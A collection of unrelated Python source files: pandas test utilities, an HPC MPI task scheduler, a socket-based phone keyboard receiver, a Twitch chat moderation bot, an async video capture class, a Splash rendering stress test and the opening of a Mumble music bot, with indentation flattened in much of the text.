def _make_skipna_wrapper(alternative, skipna_alternative=None):
"""
Create a function for calling on an array.
Parameters
----------
alternative : function
The function to be called on the array with no NaNs.
Only used when 'skipna_alternative' is None.
skipna_alternative : function
The function to be called on the original array
Returns
-------
function
"""
if skipna_alternative:
def skipna_wrapper(x):
return skipna_alternative(x.values)
else:
def skipna_wrapper(x):
nona = x.dropna()
if len(nona) == 0:
return np.nan
return alternative(nona)
return skipna_wrapper
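# Illustrative sketch (not part of the original module): the wrapper drops NaNs
# before applying the plain reducer.
def _example_make_skipna_wrapper():
    wrapped_sum = _make_skipna_wrapper(np.sum)
    assert wrapped_sum(Series([1.0, np.nan, 2.0])) == 3.0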
def convert_rows_list_to_csv_str(rows_list: List[str]):
"""
Convert list of CSV rows to single CSV-formatted string for current OS.
This method is used for creating expected value of to_csv() method.
Parameters
----------
rows_list : List[str]
Each element represents the row of csv.
Returns
-------
str
Expected output of to_csv() in current OS.
"""
sep = os.linesep
expected = sep.join(rows_list) + sep
return expected
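# Illustrative sketch (not part of the original module): rows are joined with
# the OS line separator, with a trailing separator as to_csv() emits.
def _example_convert_rows_list_to_csv_str():
    expected = convert_rows_list_to_csv_str(["a,b", "1,2"])
    assert expected == "a,b" + os.linesep + "1,2" + os.linesep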
def external_error_raised(expected_exception: Type[Exception]) -> ContextManager:
"""
Helper function to mark pytest.raises that have an external error message.
Parameters
----------
expected_exception : Exception
Expected error to raise.
Returns
-------
Callable
Regular `pytest.raises` function with `match` equal to `None`.
"""
import pytest
return pytest.raises(expected_exception, match=None)
cython_table = pd.core.base.SelectionMixin._cython_table.items()
def get_cython_table_params(ndframe, func_names_and_expected):
"""
Combine frame, functions from SelectionMixin._cython_table
keys and expected result.
Parameters
----------
ndframe : DataFrame or Series
func_names_and_expected : Sequence of two items
The first item is a name of a NDFrame method ('sum', 'prod') etc.
The second item is the expected return value.
Returns
-------
list
        List of three-item tuples (ndframe, function or function name, expected result).
"""
results = []
for func_name, expected in func_names_and_expected:
results.append((ndframe, func_name, expected))
results += [
(ndframe, func, expected)
for func, name in cython_table
if name == func_name
]
return results
def get_op_from_name(op_name: str) -> Callable:
"""
The operator function for a given op name.
Parameters
----------
op_name : string
The op name, in form of "add" or "__add__".
Returns
-------
function
A function performing the operation.
"""
short_opname = op_name.strip("_")
try:
op = getattr(operator, short_opname)
except AttributeError:
# Assume it is the reverse operator
rop = getattr(operator, short_opname[1:])
op = lambda x, y: rop(y, x)
return op
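# Illustrative sketch (not part of the original module): plain and reversed
# dunder-style names both resolve, with reversed ops swapping their operands.
def _example_get_op_from_name():
    add = get_op_from_name("__add__")
    radd = get_op_from_name("__radd__")
    assert add(2, 3) == 5
    assert radd("a", "b") == "ba"  # operator.add("b", "a")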
|
auto_running.py
|
import subprocess
import os
import time
import pandas
import glob
import tqdm
import logging
import heapq
import json
from re import search
import uuid
import multiprocessing as mp
import numpy as np
from typing import List
class PriorityQueue:
"""
Implements a priority queue data structure. Each inserted item
has a priority associated with it and the client is usually interested
in quick retrieval of the lowest-priority item in the queue. This
data structure allows O(1) access to the lowest-priority item.
"""
def __init__(self):
self.heap = []
self.count = 0
def push(self, item, priority):
entry = (priority, self.count, item)
heapq.heappush(self.heap, entry)
self.count += 1
def pop(self):
(_, _, item) = heapq.heappop(self.heap)
return item
def isEmpty(self):
return len(self.heap) == 0
def update(self, item, priority):
# If item already in priority queue with higher priority, update its priority and rebuild the heap.
# If item already in priority queue with equal or lower priority, do nothing.
# If item not in priority queue, do the same thing as self.push.
for index, (p, c, i) in enumerate(self.heap):
if i == item:
if p <= priority:
break
del self.heap[index]
self.heap.append((priority, c, item))
heapq.heapify(self.heap)
break
else:
self.push(item, priority)
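# Illustrative sketch (not part of the original script): lower priority values
# pop first, and update() only promotes an item to a strictly lower priority.
def _example_priority_queue():
    pq = PriorityQueue()
    pq.push("low", 5)
    pq.push("high", 1)
    pq.update("low", 0)  # promoted ahead of "high"
    assert pq.pop() == "low"
    assert pq.pop() == "high"
    assert pq.isEmpty()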
hostfile_dir = '/nfs/cluster/hostfiles/'
output_dir = '/nfs/cluster/result'
ramble_binary = "/nfs/cluster/ramBLe_hpcx/ramble"
### for debugging only
# hostfile_dir = "F:\\"
FORMAT = '[%(status)-7s] %(method)-10s %(asctime)s %(message)s'
logging.basicConfig(format=FORMAT, level=logging.INFO)
logger = logging.getLogger('task')
resource_lock = mp.Lock()
task_queue = PriorityQueue()
def can_allocate(n: int, cpu_resource_remain) -> bool:
"""
    :param n: number of CPU cores requested
    :return: whether the remaining CPU resources can satisfy a request for n cores
"""
# print(cpu_resource_remain)
resource_lock.acquire()
res = False
if n <= 32:
for node in cpu_resource_remain.keys():
if len(cpu_resource_remain[node]) >= n:
res = True
break
elif n > 64:
res = sum([len(x) for x in cpu_resource_remain.values()]) >= n
else:
x = None
for node in cpu_resource_remain.keys():
if len(cpu_resource_remain[node]) >= 32:
x = node
break
if x is not None:
for node in cpu_resource_remain.keys():
if node != x:
if len(cpu_resource_remain[node]) >= n - 32:
res = True
break
resource_lock.release()
return res
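# Illustrative sketch (not part of the original script): requests of up to 32
# cores must fit on one node; 32-64 cores are split as 32 on one node plus the
# remainder on another; larger requests only need enough cores in total.
def _example_can_allocate():
    remain = {"node-a": set(range(32)), "node-b": set(range(8))}
    assert can_allocate(16, remain)       # fits on a single node
    assert can_allocate(40, remain)       # 32 on node-a + 8 on node-b
    assert not can_allocate(48, remain)   # node-b cannot supply the remaining 16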
def generate_rankfile(n: int, filename: str, cpu_resource_remain) -> dict:
"""
:param n: core number to request
:param filename: hostfile path
:return: rankfile dict
"""
resource_lock.acquire()
rankfile_dict = {}
if n <= 32:
for node in cpu_resource_remain.keys():
if len(cpu_resource_remain[node]) >= n:
rankfile_dict[node] = set(sorted(list(cpu_resource_remain[node]))[:n])
cpu_resource_remain[node] -= rankfile_dict[node]
break
elif n > 64:
n_copied = n
for node in cpu_resource_remain.keys():
now_core_num = len(cpu_resource_remain[node])
if now_core_num == 0:
continue
if n_copied >= now_core_num:
rankfile_dict[node] = set(sorted(list(cpu_resource_remain[node])))
cpu_resource_remain[node] -= rankfile_dict[node]
n_copied -= now_core_num
else:
rankfile_dict[node] = set(sorted(list(cpu_resource_remain[node]))[:n_copied])
cpu_resource_remain[node] -= rankfile_dict[node]
n_copied = 0
break
else:
x = None
n_copied = n
for node in cpu_resource_remain.keys():
if len(cpu_resource_remain[node]) == 32:
x = node
rankfile_dict[node] = set(sorted(list(cpu_resource_remain[node])))
cpu_resource_remain[node] -= rankfile_dict[node]
n_copied -= 32
break
for node in cpu_resource_remain.keys():
if node != x:
if len(cpu_resource_remain[node]) >= n_copied:
rankfile_dict[node] = set(sorted(list(cpu_resource_remain[node]))[:n_copied])
cpu_resource_remain[node] -= rankfile_dict[node]
n_copied = 0
break
with open(filename, 'w') as f:
rank_count = 0
for node in rankfile_dict.keys():
for core in rankfile_dict[node]:
f.write("rank {rank_num}={hostname} slots={core_num}\n".format(rank_num=rank_count, hostname=node,
core_num=core))
rank_count += 1
resource_lock.release()
return rankfile_dict
def generate_hostfile(n: int, filename: str, cpu_resource_remain) -> dict:
"""
:param n: core number to request
:param filename: hostfile path
:return: hostfile dict
"""
resource_lock.acquire()
hostfile_dict = {}
for node in cpu_resource_remain.keys():
now_core_num = cpu_resource_remain[node]
if now_core_num == 0:
continue
if n > now_core_num:
hostfile_dict[node] = now_core_num
cpu_resource_remain[node] -= now_core_num
n -= now_core_num
else:
hostfile_dict[node] = n
cpu_resource_remain[node] -= n
n = 0
break
with open(filename, 'w') as f:
for node in hostfile_dict.keys():
f.write("{} slots={}\n".format(node, hostfile_dict[node]))
# print(cpu_resource_remain)
resource_lock.release()
return hostfile_dict
def finish_compute(slot_dict: dict, cpu_resource_remain):
"""
:param slot_dict: hostfile dict
:return:
"""
resource_lock.acquire()
for node in slot_dict.keys():
cpu_resource_remain[node] = cpu_resource_remain[node] | slot_dict[node]
# print(cpu_resource_remain)
resource_lock.release()
task_check_set = {"name", "input", "cores", "algorithm", "level", "flags", "sep", "n", "m", "repeat"}
def read_task_from_file(filename):
"""
:param filename: json task file name
input: "/nfs/scratch/C1_discretized.tsv" filepath
output: "/nfs/scratch/" result save dir
cores: 128 int
level: 0 int
flags: "-d" string like "-c -v -i -d"
sep: "$'\t'" means tab
n: 0 int
m: 0 int
repeat: 1 int
:return: task list
"""
global ramble_binary
global output_dir
with open(filename, 'r') as f:
file_json = json.load(f)
ramble_binary = file_json['ramble_binary']
output_dir = file_json['result_directory']
task_list = file_json['tasks']
# check task in task list have all
for index, task in enumerate(task_list):
if set(task.keys()) == task_check_set:
d = {"status": 'success', 'method': 'read file'}
logger.info("read task No.{} successfully".format(index), extra=d)
else:
d = {"status": 'failed', 'method': 'read file'}
logger.error("read task No.{} failed please check and try again".format(index), extra=d)
raise ValueError
return task_list
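# Illustrative sketch (not part of the original script): a minimal task file that
# read_task_from_file() accepts; every task must carry exactly the keys listed in
# task_check_set. The "gs" algorithm name below is hypothetical.
_EXAMPLE_TASKS_JSON = {
    "ramble_binary": "/nfs/cluster/ramBLe_hpcx/ramble",
    "result_directory": "/nfs/cluster/result",
    "tasks": [
        {
            "name": "C1",
            "input": "/nfs/scratch/C1_discretized.tsv",
            "cores": 64,
            "algorithm": "gs",
            "level": 0,
            "flags": "-c -v -i -d",
            "sep": "$'\\t'",  # literal $'\t', expanded by the shell to a tab
            "n": 0,
            "m": 0,
            "repeat": 1,
        }
    ],
}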
def generate_command(task: dict, cpu_resource_remain):
"""
allocate cpu resources and generate commands
:param task: single task dict from the json file
:return:
"""
# create hostfile
task_name = task['name']
task_algo = task['algorithm']
task_core = task['cores']
hostfilename = "{name}_{core}_{algo}.hostfile".format(
name=task_name,
core=task_core,
algo=task_algo
)
hostfile_path = os.path.join(hostfile_dir, hostfilename)
# slot_dict = generate_hostfile(task_core, hostfile_path, cpu_resource_remain)
slot_dict = generate_rankfile(task_core, hostfile_path, cpu_resource_remain)
# generate command list
command_list = []
for repeat_times in range(task['repeat']):
output_filename = "{name}_{core}_{algo}_{repeat}.dot".format(
name=task_name,
core=task_core,
algo=task_algo,
repeat=repeat_times
)
output_filepath = os.path.join(output_dir, output_filename)
timer_filename = "{name}_{core}_{algo}_{repeat}.timer".format(
name=task_name,
core=task_core,
algo=task_algo,
repeat=repeat_times
)
timer_filepath = os.path.join(output_dir, timer_filename)
command = """mpirun -np {cores} \
-rf {hostfile} \
-x MXM_RDMA_PORTS=mlx5_0:1 \
-mca btl_openib_if_include mlx5_0:1 \
-x UCX_NET_DEVICES=mlx5_0:1 \
{ramble} -f {input} -n {n} -m {m} {flag} -s {sep} -o {output} -a {algo} -r --warmup --hostnames""".format(
cores=task_core,
hostfile=hostfile_path,
ramble=ramble_binary,
input=task['input'],
n=task['n'],
m=task['m'],
flag=task['flags'],
sep=task['sep'],
output=output_filepath,
algo=task_algo
)
command_list.append((command, timer_filepath))
return slot_dict, command_list
def get_runtime(action, output, required=True):
float_pattern = r'((?:(?:\d*\.\d+)|(?:\d+\.?))(?:[Ee][+-]?\d+)?)'
pattern = 'Time taken in %s: %s' % (action, float_pattern)
match = search(pattern, output)
if required:
return float(match.group(1))
else:
return float(match.group(1) if match is not None else 0)
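# Illustrative sketch (not part of the original script): runtimes are parsed out
# of ramBLe's "Time taken in <action>: <seconds>" log lines; missing optional
# actions fall back to 0.
def _example_get_runtime():
    output = "Time taken in reading the file: 1.25 sec\n"
    assert get_runtime("reading the file", output) == 1.25
    assert get_runtime("warming up MPI", output, required=False) == 0.0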
def parse_runtimes(process, result_path):
output = ''
for line in iter(process.stdout.readline, b''):
line = line.decode('utf-8')
output += line
# write into result file
with open(result_path, 'w') as f:
# print(output)
f.write(output)
# optional runtimes
warmup = get_runtime('warming up MPI', output, required=False)
redistributing = get_runtime('redistributing', output, required=False)
blankets = get_runtime('getting the blankets', output, required=False)
symmetry = get_runtime('symmetry correcting the blankets', output, required=False)
sync = get_runtime('synchronizing the blankets', output, required=False)
neighbors = get_runtime('getting the neighbors', output, required=False)
direction = get_runtime('directing the edges', output, required=False)
gsquare = get_runtime('G-square computations', output, required=False)
mxx = get_runtime('mxx calls', output, required=False)
# required runtimes
reading = get_runtime('reading the file', output, required=True)
network = get_runtime('getting the network', output, required=True)
writing = get_runtime('writing the network', output, required=True)
return [warmup, reading, redistributing, blankets, symmetry, sync, neighbors, direction, mxx, gsquare, network,
writing]
def run_task(task: dict, cpu_resource_remain):
slot_dict, command_list = generate_command(task, cpu_resource_remain)
d = {"status": 'success', 'method': 'allocate'}
logger.info("allocate {} cores successfully".format(task["cores"]), extra=d)
result_list = []
for command, result_path in command_list:
d = {"status": 'process', 'method': 'running'}
logger.info("start {} cores of {}".format(task["cores"], task["name"]), extra=d)
process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE)
timer_list = parse_runtimes(process, result_path)
d = {"status": 'success', 'method': 'running'}
logger.info("success {} cores of {}".format(task["cores"], task["name"]), extra=d)
result_list.append(timer_list)
finish_compute(slot_dict, cpu_resource_remain)
result_list_np = np.array(result_list)
timer_filename = "{name}_{core}_{algo}_average.timer".format(
name=task["name"],
core=task["cores"],
algo=task["algorithm"]
)
timer_filepath = os.path.join(output_dir, timer_filename)
average_result = np.average(result_list_np, axis=0)
average_res = {
"warmup": average_result[0],
"reading": average_result[1],
"redistributing": average_result[2],
"blankets": average_result[3],
"symmetry": average_result[4],
"sync": average_result[5],
"neighbors": average_result[6],
"direction": average_result[7],
"mxx": average_result[8],
"gsquare": average_result[9],
"network": average_result[10],
"writing": average_result[11],
}
with open(timer_filepath, 'w') as f:
json.dump(average_res, f)
if __name__ == '__main__':
manager = mp.Manager()
cpu_resource_remain = manager.dict()
cpu_resource_remain["hpc-cluster-node-1"] = set(range(4, 36))
cpu_resource_remain["hpc-cluster-node-2"] = set(range(4, 36))
cpu_resource_remain["hpc-cluster-node-3"] = set(range(4, 36))
cpu_resource_remain["hpc-cluster-node-4"] = set(range(4, 36))
task_list = read_task_from_file("tasks.json")
for task in task_list:
task_queue.push(task, task['level'])
now_task = task_queue.pop()
while not task_queue.isEmpty():
if can_allocate(now_task["cores"], cpu_resource_remain):
d = {"status": 'success', 'method': 'allocate'}
logger.info("{} cores can be allocated".format(now_task["cores"]), extra=d)
mp.Process(target=run_task, args=(now_task, cpu_resource_remain)).start()
now_task = task_queue.pop()
time.sleep(60)
|
flick_kb_receiver.py
|
"""
Flick keyboard (receiver side)
For PC
"""
import sys
import time
import socket
import pyautogui
import pyperclip
import threading
def type_text(text):
    # Type the given text (copy it to the clipboard and paste with Ctrl+V)
pyperclip.copy(text)
pyautogui.hotkey("ctrl", "v")
return True
def type_backspace():
pyautogui.typewrite(["backspace"])
return True
def type_enter():
pyautogui.typewrite(["enter"])
return True
class Receiver():
def __init__(self, port, ipaddr=None, set_daemon=True):
"""
        Receiver side.
        Parameters
        ----------
        port : int
            Port number to use.
        ipaddr : None or str
            IP address of the receiving PC. If None, it is obtained automatically.
        set_daemon : bool
            Whether to daemonize the thread. If True, the main thread can exit
            without waiting for the receiver thread to finish.
"""
if(ipaddr is None):
host = socket.gethostname()
ipaddr = socket.gethostbyname(host)
self.ipaddr = ipaddr
self.port = port
self.set_daemon = set_daemon
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.loopflag = False
print("ip:{0} port:{1}".format(self.ipaddr, self.port))
def loop(self):
self.sock.settimeout(0.5)
self.sock.bind((self.ipaddr, self.port))
self.sock.listen(1)
print("start listening...")
while(self.loopflag):
try:
conn, addr = self.sock.accept()
except socket.timeout:
continue
print("accepted")
with conn:
while(self.loopflag):
# print("waiting...")
data = conn.recv(1024)
if(not data):
break
if(data[:1]==b"\x08"): # 連続してbackspaceを押すと,複数個同時に送られてくる(例:b"\x08\x08\x08)ことがあるため,先頭8バイトのみチェック
print("> BS")
type_backspace()
elif(data==b"\x0a"):
print("> Enter")
type_enter()
elif(data==b"\x00"):
print("STOP CLIENT")
break
else:
text = data.decode("utf-8")
print(">", text)
type_text(text)
def start_loop(self):
self.loopflag = True
self.thread = threading.Thread(target=self.loop)
if(self.set_daemon):
self.thread.setDaemon(True)
self.thread.start()
print("start_thread")
def stop_loop(self):
print("stop loop")
self.loopflag = False
        time.sleep(0.6) # wait until the socket accept() times out
if(not self.set_daemon):
print("waiting to stop client...") # 送信側が停止するのを待つ
self.thread.join()
print("stop_thread")
def close_sock(self):
self.sock.close()
print("socket closed")
def main():
"""
    Set the port number to match the sender (smartphone) side.
    While running, type "s" in the console and press Enter to stop the receiver (PC) side.
"""
    # Command-line arguments
ipaddr = None
args = sys.argv
if(len(args)<=1):
print("Usage: flick_kb_receiver [PORT] [IP (optional)]")
sys.exit()
elif(len(args)==2):
port = int(args[1])
else:
port = int(args[1])
ipaddr = args[2]
    # Main processing
receiver = Receiver(port=port, ipaddr=ipaddr)
receiver.start_loop()
while True:
stopper = input()
if(stopper=="s"):
receiver.stop_loop()
break
receiver.close_sock()
if __name__=="__main__":
main()
|
subonly.py
|
"""
Copyright 2021 Ashe Muller
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import requests
import time
from threading import Thread
import json
from websocket import create_connection
class oauthToken:
def __init__(self):
self.credentials = json.load(open('credentials.json'))
def getToken(self):
r = requests.post(f"https://id.twitch.tv/oauth2/token?client_id={self.credentials['id']}&client_secret={self.credentials['secret']}&grant_type=client_credentials")
return f"Bearer {r.json()['access_token']}"
with open('users.json', 'r') as f:
users = json.load(f)['users']
credentials = json.load(open('credentials.json'))
cid = credentials['id']
secret = credentials['secret']
o = oauthToken()
api = o.getToken()
irc = credentials['irc']
def emotesOnly(status, username):
    # Despite its name, this toggles subscribers-only chat via the
    # /subscribers and /subscribersoff IRC commands.
ws = create_connection('wss://irc-ws.chat.twitch.tv')
ws.send(f'PASS {irc}')
ws.send(f'NICK hateraidsbgone')
ws.send(f'JOIN #{username}')
if status == 1:
print(f'turning subscribers-only on for user {username}')
ws.send(f"PRIVMSG #{username} :/subscribers")
else:
print(f'turning subscribers-only off for user {username}')
ws.send(f"PRIVMSG #{username} :/subscribersoff")
ws.close()
def channelLive(username):
global api
global cid
headers = {'Accept': 'application/vnd.twitchtv.v5+json', "Client-Id": cid, "Authorization": api}
r = requests.get(f'https://api.twitch.tv/helix/streams?user_login={username}', headers=headers).json()
if r['data'] == []:
return False
else:
return True
loopJson = {}
def mainLoopThread(item):
global loopJson
if channelLive(item) == False and loopJson[item] != True:
loopJson[item] = True
emotesOnly(1, item)
elif channelLive(item) == True and loopJson[item] != False:
loopJson[item] = False
emotesOnly(0, item)
def mainLoop(users=[]):
global loopJson
for item in users:
loopJson[item] = None
while True:
for item in users:
th = Thread(target=mainLoopThread, args=(item,))
th.start()
time.sleep(2.5)
Thread(target=mainLoop, args=(users,)).start()
|
videocaptureasync.py
|
# https://github.com/gilbertfrancois/video-capture-async
import threading
import cv2
import time
WARMUP_TIMEOUT = 10.0
class VideoCaptureAsync:
def __init__(self, src=0, width=640, height=480):
self.src = src
self.cap = cv2.VideoCapture(self.src)
if not self.cap.isOpened():
raise RuntimeError("Cannot open camera")
self.cap.set(cv2.CAP_PROP_FRAME_WIDTH, width)
self.cap.set(cv2.CAP_PROP_FRAME_HEIGHT, height)
self.grabbed, self.frame = self.cap.read()
self.started = False
self.read_lock = threading.Lock()
def set(self, var1, var2):
self.cap.set(var1, var2)
def isOpened(self):
return self.cap.isOpened()
def start(self):
if self.started:
print('[!] Asynchronous video capturing has already been started.')
return None
self.started = True
self.thread = threading.Thread(target=self.update, args=(), daemon=True)
self.thread.start()
# (warmup) wait for the first successfully grabbed frame
warmup_start_time = time.time()
while not self.grabbed:
warmup_elapsed_time = (time.time() - warmup_start_time)
if warmup_elapsed_time > WARMUP_TIMEOUT:
raise RuntimeError(f"Failed to succesfully grab frame from the camera (timeout={WARMUP_TIMEOUT}s). Try to restart.")
time.sleep(0.5)
return self
def update(self):
while self.started:
grabbed, frame = self.cap.read()
with self.read_lock:
self.grabbed = grabbed
self.frame = frame
def read(self):
while True:
try:
with self.read_lock:
frame = self.frame.copy()
grabbed = self.grabbed
except AttributeError:
continue
break
return grabbed, frame
def stop(self):
self.started = False
self.thread.join()
def __exit__(self, exec_type, exc_value, traceback):
self.cap.release()
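# Illustrative usage sketch (not part of the original module); assumes a camera
# is available at index 0.
def _example_video_capture_async():
    cap = VideoCaptureAsync(src=0, width=640, height=480)
    cap.start()
    try:
        grabbed, frame = cap.read()  # always returns the most recently grabbed frame
        print(grabbed, frame.shape)
    finally:
        cap.stop()
        cap.cap.release()  # release the underlying cv2 capture directly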
|
stress.py
|
import sys, random, optparse, time, json
from itertools import islice
from threading import Thread
from collections import Counter
from queue import Queue
import requests
from .utils import SplashServer, MockServer
class StressTest():
def __init__(self, reqs, host="localhost:8050", requests=1000, concurrency=50, shuffle=False, verbose=False):
self.reqs = reqs
self.host = host
self.requests = requests
self.concurrency = concurrency
self.shuffle = shuffle
self.verbose = verbose
def run(self):
args = list(islice(self.reqs, self.requests))
if self.shuffle:
random.shuffle(args)
print("Total requests: %d" % len(args))
print("Concurrency : %d" % self.concurrency)
starttime = time.time()
q, p = Queue(), Queue()
for _ in range(self.concurrency):
t = Thread(target=worker, args=(self.host, q, p, self.verbose))
t.daemon = True
t.start()
for a in args:
q.put(a)
q.join()
outputs = []
for _ in range(self.requests):
outputs.append(p.get())
elapsed = time.time() - starttime
print()
print("Total requests: %d" % len(args))
print("Concurrency : %d" % self.concurrency)
print("Elapsed time : %.3fs" % elapsed)
print("Avg time p/req: %.3fs" % (elapsed/len(args)))
print("Received (per status code or error):")
for c, n in Counter(outputs).items():
print(" %s: %d" % (c, n))
def worker(host, q, p, verbose=False):
url = "http://%s/render.html" % host
while True:
try:
args = q.get()
t = time.time()
r = requests.get(url, params=args)
t = time.time() - t
p.put(r.status_code)
if verbose:
print(". %d %.3fs %s" % (r.status_code, t, args))
else:
sys.stdout.write(".")
sys.stdout.flush()
except Exception as e:
p.put(type(e))
if verbose:
print("E %.3fs %s" % (t, args))
else:
sys.stdout.write("E")
sys.stdout.flush()
finally:
q.task_done()
class MockArgs(object):
ok_urls = 0.5
error_urls = 0.3
timeout_urls = 0.2
def __init__(self, requests=1000):
self.requests = requests
def _ok_urls(self):
url = ["http://localhost:8998/jsrender"]
return int(self.requests * self.ok_urls) * url
def _error_urls(self):
url = ["http://non-existent-host/"]
return int(self.requests * self.error_urls) * url
def _timeout_urls(self):
url = ["http://localhost:8998/delay?n=10&timeout=0.5"]
return int(self.requests * self.timeout_urls) * url
def __iter__(self):
ok_urls = self._ok_urls()
error_urls = self._error_urls()
timeout_urls = self._timeout_urls()
print("Expected codes: HTTP200x%d, HTTP502x%d, HTTP504x%d" % (
len(ok_urls), len(error_urls), len(timeout_urls)))
urls = ok_urls + error_urls + timeout_urls
return ({"url": x} for x in urls)
class ArgsFromUrlFile(object):
def __init__(self, urlfile):
self.urlfile = urlfile
def __iter__(self):
for line in open(self.urlfile):
url = line.rstrip()
if '://' not in url:
url = 'http://' + url
yield {"url": url, "timeout": 60}
class ArgsFromLogfile(object):
def __init__(self, logfile):
self.logfile = logfile
def __iter__(self):
for l in open(self.logfile):
if "[stats]" in l:
d = json.loads(l[33:].rstrip())
yield d['args']
def lua_runonce(script, timeout=60., splash_args=None, **kwargs):
""" Start splash server, execute lua script in it and return the output.
:type script: str
:param script: Script to be executed.
:type timeout: float
:param timeout: Timeout value for the execution request.
:param splash_args: Extra parameters for splash server invocation.
:type kwargs: dict
:param kwargs: Any other parameters are passed as arguments to the request
and will be available via ``splash.args``.
This function also starts a `MockServer`. If `url` kwarg has scheme=mock,
e.g., "mock://jsrender", it will be resolved as a url pointing to
corresponding mock server resource.
"""
if splash_args is None:
splash_args = ['--disable-lua-sandbox',
'--allowed-schemes=file,http,https', ]
with SplashServer(extra_args=splash_args) as s, \
MockServer() as ms:
if kwargs.get('url', '').startswith('mock://'):
kwargs['url'] = ms.url(kwargs['url'][7:])
params = {'lua_source': script}
params.update(kwargs)
resp = requests.get(s.url('execute'), params=params, timeout=timeout)
if resp.ok:
return resp.content
else:
raise RuntimeError(resp.text)
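# Illustrative sketch (not part of the original module): run a trivial Lua script
# through a throwaway Splash instance; assumes Splash and the test helpers
# (SplashServer, MockServer) are available locally.
def _example_lua_runonce():
    script = """
    function main(splash)
        return 'hello'
    end
    """
    print(lua_runonce(script, timeout=30.0))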
def benchmark_png(url, viewport=None, wait=0.5, render_all=1,
width=None, height=None, nrepeats=3, timeout=60.):
f = """
function main(splash)
local resp, err = splash:go(splash.args.url)
assert(resp, err)
assert(splash:wait(tonumber(splash.args.wait)))
-- if viewport is 'full' it should be set only after waiting
if splash.args.viewport ~= nil and splash.args.viewport ~= "full" then
local w, h = string.match(splash.args.viewport, '^(%d+)x(%d+)')
if w == nil or h == nil then
error('Invalid viewport size format: ' .. splash.args.viewport)
end
splash:set_viewport_size(tonumber(w), tonumber(h))
end
local susage = splash:get_perf_stats()
local nrepeats = tonumber(splash.args.nrepeats)
local render_all = splash.args.render_all or splash.args.viewport == 'full'
local png, err
for i = 1, nrepeats do
png, err = splash:png{width=splash.args.width,
height=splash.args.height,
render_all=render_all}
assert(png, err)
end
local eusage = splash:get_perf_stats()
return {
wallclock_secs=(eusage.walltime - susage.walltime) / nrepeats,
maxrss=eusage.maxrss,
cpu_secs=(eusage.cputime - susage.cputime) / nrepeats,
png=png,
}
end
"""
return json.loads(lua_runonce(
f, url=url, width=width, height=height, render_all=render_all,
nrepeats=nrepeats, wait=wait, viewport=viewport, timeout=timeout))
def parse_opts():
op = optparse.OptionParser()
op.add_option("-H", dest="host", default="localhost:8050",
help="splash hostname & port (default: %default)")
op.add_option("-u", dest="urlfile", metavar="FILE",
help="read urls from FILE instead of using mock server ones")
op.add_option("-l", dest="logfile", metavar="FILE",
help="read urls from splash log file (useful for replaying)")
op.add_option("-s", dest="shuffle", action="store_true", default=False,
help="shuffle (randomize) requests (default: %default)")
op.add_option("-v", dest="verbose", action="store_true", default=False,
help="verbose mode (default: %default)")
op.add_option("-c", dest="concurrency", type="int", default=50,
help="concurrency (default: %default)")
op.add_option("-n", dest="requests", type="int", default=1000,
help="number of requests (default: %default)")
return op.parse_args()
def main():
opts, _ = parse_opts()
if opts.urlfile:
urls = ArgsFromUrlFile(opts.urlfile)
elif opts.logfile:
urls = ArgsFromLogfile(opts.logfile)
else:
urls = MockArgs(opts.requests)
t = StressTest(urls, opts.host, opts.requests, opts.concurrency, opts.shuffle, opts.verbose)
t.run()
if __name__ == "__main__":
main()
|
mumbleBot.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import re
import threading
import time
import sys
import math
import signal
import configparser
import audioop
import subprocess as sp
import argparse
import os
import os.path
import pymumble_py3 as pymumble
import pymumble_py3.constants
import variables as var
import logging
import logging.handlers
import traceback
import struct
from packaging import version
import util
import command
import constants
import media.playlist
from constants import tr_cli as tr
from database import SettingsDatabase, MusicDatabase, DatabaseMigration
from media.item import ValidationFailedError, PreparationFailedError
from media.cache import MusicCache
class MumbleBot:
version = 'git'
def __init__(self, args):
self.log = logging.getLogger("bot")
self.log.info(f"bot: botamusique version {self.get_version()}, starting...")
signal.signal(signal.SIGINT, self.ctrl_caught)
self.cmd_handle = {}
self.stereo = var.config.getboolean('bot', 'stereo', fallback=True)
if args.channel:
self.channel = args.channel
else:
self.channel = var.config.get("server", "channel", fallback=None)
var.user = args.user
var.is_proxified = var.config.getboolean(
"webinterface", "is_web_proxified")
# Flags to indicate the bot is exiting (Ctrl-C, or !kill)
self.exit = False
self.nb_exit = 0
# Related to ffmpeg thread
self.thread = None
self.thread_stderr = None
self.read_pcm_size = 0
self.pcm_buffer_size = 0
self.last_ffmpeg_err = ""
# Play/pause status
self.is_pause = False
self.pause_at_id = ""
self.playhead = -1 # current position in a song.
self.song_start_at = -1
        self.wait_for_ready = False  # flag: the main loop is waiting for a download to complete in another thread
#
self.on_interrupting = False
if args.host:
host = args.host
else:
host = var.config.get("server", "host")
if args.port:
port = args.port
else:
port = var.config.getint("server", "port")
if args.password:
password = args.password
else:
password = var.config.get("server", "password")
if args.channel:
self.channel = args.channel
else:
self.channel = var.config.get("server", "channel")
if args.certificate:
certificate = args.certificate
else:
certificate = util.solve_filepath(var.config.get("server", "certificate"))
if args.tokens:
tokens = args.tokens
else:
tokens = var.config.get("server", "tokens")
tokens = tokens.split(',')
if args.bots:
self.bots = set(args.bots)
else:
bots = var.config.get("server", "bots",fallback="")
self.bots = set(bots.split(','))
if args.user:
self.username = args.user
else:
self.username = var.config.get("bot", "username")
if args.bandwidth:
self.bandwidth = args.bandwidth
else:
self.bandwidth = var.config.getint("bot", "bandwidth")
self.mumble = pymumble.Mumble(host, user=self.username, port=port, password=password, tokens=tokens,
stereo=self.stereo,
debug=var.config.getboolean('debug', 'mumbleConnection'),
certfile=certificate)
self.mumble.callbacks.set_callback(pymumble.constants.PYMUMBLE_CLBK_TEXTMESSAGERECEIVED, self.message_received)
self.mumble.set_codec_profile("audio")
self.mumble.start() # start the mumble thread
self.mumble.is_ready() # wait for the connection
if self.mumble.connected >= pymumble.constants.PYMUMBLE_CONN_STATE_FAILED:
exit()
self.set_comment()
        self.mumble.users.myself.unmute()  # make sure the bot is not muted
self.join_channel()
self.mumble.set_bandwidth(self.bandwidth)
self._user_in_channel = self.get_user_count_in_channel()
# ====== Volume ======
self.volume_helper = util.VolumeHelper()
